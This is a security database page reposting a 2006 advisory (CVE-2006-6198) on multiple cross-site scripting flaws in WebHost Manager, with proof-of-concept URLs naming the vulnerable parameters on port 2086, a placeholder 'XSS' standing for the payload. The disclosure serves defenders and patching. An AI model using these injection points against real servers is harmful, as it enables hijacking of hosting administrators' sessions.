SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

WebHost Manager (WHM) Multiple Cross-Site Scripting


Arrow  SecurityAlert : 1938
Arrow  CVE : CVE-2006-6198
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : Aria-Security Team Advisory
Arrow  Published : 01.12.2006

Arrow  Affected Software : WebHost Manager (WHM)



Arrow  Advisory Content :  

#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory:
#http://www.aria-security.com/forum/showthread.php?t=44
#-----------------------------------------------------------
#Software: WebHost Manager (WHM)
#Tested WHM X v3.1.0 (demo.cpanel.net)
#Poc:
#
http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&emai
l=XSS
http://target:2086/cgi/addon_configsupport.cgi?cgiaction=save&supportadd
y=Domain.name&emailpipecmd=Domain.name&displaybrowserbody=1&displaybrows
ersubject=1&displaydomainbody=1&displaydomainsubject=1&displayhostnamebo
dy=1&displayhostnamesubject=1&displayipbody=1&displayipsubject=1&display
userbody=1&displayusersubject=1&type=redirect&supporturl=XSS
http://target:2086/scripts/editpkg?pkg=XSS
http://target2086/scripts2/domts2?domain=XSS
http://target:2086/scripts/editzone?domain=XSS
http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=X
SS
http://target:2086/scripts/park?domain=demo.com&ndomain=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: Advisory (at) aria-security (dot) net [email concealed]





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.